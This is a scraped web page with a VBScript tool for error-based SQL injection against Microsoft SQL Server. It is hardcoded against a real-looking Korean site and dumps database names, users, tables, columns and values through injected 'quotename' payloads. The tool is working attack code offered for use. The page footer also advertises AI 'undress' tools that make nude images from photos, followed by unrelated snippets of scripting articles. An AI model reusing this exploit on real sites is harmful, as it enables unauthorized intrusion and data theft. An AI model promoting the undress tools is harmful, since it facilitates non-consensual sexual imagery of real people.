Sql2005注射辅助脚本[粗糙版]
'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com '亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。
作者:Tr4c3'为了保持脚本的通用性,放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改
'更多功能请大家自己加入
Const method = "Get" '提交方式请修改此处,有get和post可选
Const DisPlay = "D" 'S 保存到文件,D输出到屏幕
Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD
strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'" '基于注射点的不确定性,此处请手工更改
i = 1 '库的基数
k = 0 '表和字段的基数
MyArray = Split(strUrl_B, "?", -1, 1)
strUrl = MyArray(0) '取url
strArg = MyArray(1) '取参数
Set Args = Wscript.Arguments
If Args.Count = 0 Then
ShowU
End If
'If Args.Count =1 And LCase(Args(0))
'************************************************************************
' 爆库
'************************************************************************
If Args.Count =1 Then
If LCase(Trim(Args(0)))="databases" Then
ResuT("---------------===============================--------------")
ResuT("All The DataBases:")
Do
strData = " and quotename(db_name("&i&"))=0--"
sqlInj(strData)
i = i + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
ElseIf LCase(Trim(Args(0)))= "info" then
ResuT("---------------===============================--------------")
ResuT("The Current Database is:")
strData = " and quotename(db_name())=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("The database User is:")
strData = " and quotename(user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("The System_user is:")
strData = " and quotename(System_user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
Wscript.Quit
End If
End If
'************************************************************************
' 爆表
'************************************************************************
If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then
ResuT("---------------===============================--------------")
ResuT("The Tables Of " & Args(0))
Do
strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If
'************************************************************************
' 爆字段
'************************************************************************
If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then
Database = Args(0)
Table = Args(1)
TarGet = DataBase & ".dbo." & Table
TarGetCol = Database & ".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("The Columns Of " & TarGet)
Do
strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If
'************************************************************************
' 爆字段值
'************************************************************************
If Args.Count=4 And LCase(Trim(Args(3)))="values" Then
Database = Args(0)
Table = Args(1)
col = Args(2)
Target = Database & ".dbo." & Table
ResuT("---------------===============================--------------")
ResuT("The Values Of " & Args(2) & " in "&Target)
Do
strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"
sqlInj(strData)
k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If
Sub SqlInj(value)
If UCase(method) = "GET" Then
value = strArg & value
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "GET", strUrl &"?" & value , False
objXML.SetRequestHeader "Referer", strUrl
'objXML.SetRequestHeader "Accept-Language", "EUC-KR"
objXML.send()
strRevS = objXML.ResponseText '默认用这个
'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
If InStr(strRevS,"'[")0 And InStr(strRevs,"]'")0 Then
strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
ResuT(" |_"&strD)
Else
strD = ""
End If
ElseIf UCase(method) = "POST" Then
value = strArg & value
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "POST", strUrl, False
objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
objXML.SetRequestHeader "Referer", strUrl
objXML.send(UrlEncode(value))
strRevS = objXML.ResponseText '默认用这个
'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
If InStr(strRevS,"'[")0 And InStr(strRevs,"]'")0 Then
strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
ResuT(" |_"&strD)
Else
strD = ""
End If
End If
End Sub
Function ResuT(strInfo)
If UCase(DisPlay) = "S" Then
Set fso = CreateObject("Scripting.FileSystemObject")
Set fso1 = fso.OpenTextFile("result.txt",8,True)
fso1.WriteLine(strInfo)
fso1.Close
Set fso = Nothing
ElseIf UCase(DisPlay) = "D" Then
Wscript.Echo(strInfo)
End If
End Function
Function UrlEncode(str)
str = Replace(str," ","+")
UrlEncode = str
End Function
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("Sql2005注射辅助脚本(粗糙版),用于mssql显错模式 By Tr4c3[at]126[Dot]com")
.Echo("Usage:")
.Echo(" cscript"&.ScriptName&" info--爆基本信息")
.Echo(" cscript"&.ScriptName&" databases--爆所有库名")
.Echo(" cscript"&.ScriptName&" pubs tables--爆库pubs里所有用户表名")
.Echo(" cscript"&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名")
.Echo(" cscript"&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值")
.Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1379
52
Python script to be executed every 5 minutes
Sep 10, 2023 pm 03:33 PM
Automation and task scheduling play a vital role in streamlining repetitive tasks in software development. Imagine there is a Python script that needs to be executed every 5 minutes, such as getting data from an API, performing data processing, or sending periodic updates. Running scripts manually so frequently can be time-consuming and error-prone. This is where task scheduling comes in. In this blog post, we will explore how to schedule a Python script to execute every 5 minutes, ensuring it runs automatically without manual intervention. We will discuss different methods and libraries that can be used to achieve this goal, allowing you to automate tasks efficiently. An easy way to run a Python script every 5 minutes using the time.sleep() function is to utilize tim
How to create a script for editing? Tutorial on how to create a script through editing
Mar 13, 2024 pm 12:46 PM
Cutting is a video editing tool with comprehensive editing functions, support for variable speed, various filters and beauty effects, and rich music library resources. In this software, you can edit videos directly or create editing scripts, but how to do it? In this tutorial, the editor will introduce the method of editing and making scripts. Production method: 1. Click to open the editing software on your computer, then find the "Creation Script" option and click to open. 2. In the creation script page, enter the "script title", and then enter a brief introduction to the shooting content in the outline. 3. How can I see the "Storyboard Description" option in the outline?
How to execute .sh file in Linux system?
Mar 14, 2024 pm 06:42 PM
How to execute .sh file in Linux system? In Linux systems, a .sh file is a file called a Shell script, which is used to execute a series of commands. Executing .sh files is a very common operation. This article will introduce how to execute .sh files in Linux systems and provide specific code examples. Method 1: Use an absolute path to execute a .sh file. To execute a .sh file in a Linux system, you can use an absolute path to specify the location of the file. The following are the specific steps: Open the terminal
Python script to shut down computer
Aug 29, 2023 am 08:01 AM
In today's fast-paced digital world, being able to automate computer tasks can greatly increase productivity and convenience. One of the tasks is shutting down the computer, which can be very time-consuming if done manually. Thankfully, Python provides us with a powerful set of tools to interact with the system and automate such tasks. In this blog post, we will explore how to write a Python script to shut down your computer easily. Whether you want to schedule an automatic shutdown, remotely initiate a shutdown, or simply save time by avoiding a manual shutdown, this script will come in handy. Importing the Required Modules Before we start writing the script, we need to import the necessary modules in order to interact with the system and execute the shutdown command. In this section we will import the os module (which
Python script to restart computer
Sep 08, 2023 pm 05:21 PM
Restarting your computer is a common task that we often perform to troubleshoot problems, install updates, or apply system changes. While there are many ways to restart your computer, using a Python script provides automation and convenience. In this article, we will explore how to create a Python script that can restart your computer with a simple execution. We will first discuss the importance of restarting your computer and the benefits it brings. We will then delve into the implementation details of the Python script, explaining the necessary modules and functionality involved. Throughout this article, we will provide detailed explanations and code snippets to ensure clear understanding. Importance of Restarting Your Computer Restarting your computer is a basic troubleshooting step that can
Python script packaging exe, auto-py-to-exe will help you!
Apr 13, 2023 pm 04:49 PM
1. What is auto-py-to-exeauto-py-to-exe is a graphical tool used to package Python programs into executable files. This article mainly introduces how to use auto-py-to-exe to complete python program packaging. auto-py-to-exe is based on pyinstaller. Compared with pyinstaller, it has an additional GUI interface and is simpler and more convenient to use. 2. To install auto-py-to-exe, first we must ensure that our python environment is greater than or equal to 2.7 Then enter in cmd: pip install
Windows PowerShell Scripting Tutorial for Beginners
Mar 13, 2024 pm 10:55 PM
We've designed this Windows PowerShell scripting tutorial for beginners, whether you're a tech enthusiast or a professional looking to improve your scripting skills. If you have no prior knowledge of PowerShell scripting, this article will start with the basics and be tailored for you. We'll help you master the installation steps for a PowerShell environment and walk you through the main concepts and features of PowerShell scripts. If you're ready to learn more about PowerShell scripting, let's embark on this exciting learning journey together! What is WindowsPowerShell? PowerShell is a hybrid command system developed by Microsoft
Five convenient and easy-to-use Python automation scripts
Apr 11, 2023 pm 07:31 PM
Compared with everyone who has heard words such as automated production lines and automated offices, machines can complete various tasks on their own without human intervention, which greatly improves work efficiency. There are various automation scripts in the programming world to complete different tasks. In particular, Python is very suitable for writing automated scripts because its syntax is concise and easy to understand, and it has a rich third-party tool library. This time we use Python to implement several automation scenarios, which may be used in your work. 1. Automatically read web news. This script can capture text from web pages and then automatically read it by voice. This is a good choice when you want to listen to news. The code is divided into two parts. The first is to crawl the web page text through the crawler, and the second is to read the text through the reading tool.
